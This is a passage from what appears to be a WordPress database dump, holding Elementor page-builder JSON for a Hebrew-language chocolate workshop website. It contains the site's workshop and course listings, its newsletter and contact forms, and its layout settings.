fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"47ca8a3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3924078b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1038fd3f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"61c45866\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2e9becfa\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"3a36cf3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f6f68b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e887a15\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"374c003\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37447efb\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"60d0c953\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"7dfe3d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"11596977\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"53b6941c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6eef024e\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1019,207,'_elementor_version','0.4'),(1021,199,'_yoast_wpseo_meta-robots-noindex','1'),(1022,208,'_wp_page_template','default'),(1023,208,'_elementor_edit_mode','builder'),(1024,208,'_elementor_template_type','post'),(1025,208,'_elementor_data','[{\"id\":\"5ae558de\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"76867a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"6b7a424b\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"29eb19f8\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"859196c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"72d55618\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"407e28c0\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"415b3ee2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6383ac34\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"55e4ccad\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"cc23117\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"65d5b2bb\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3453d936\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2e2fb1ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"489f7aa8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"1507f0f7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"25c3fc17\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\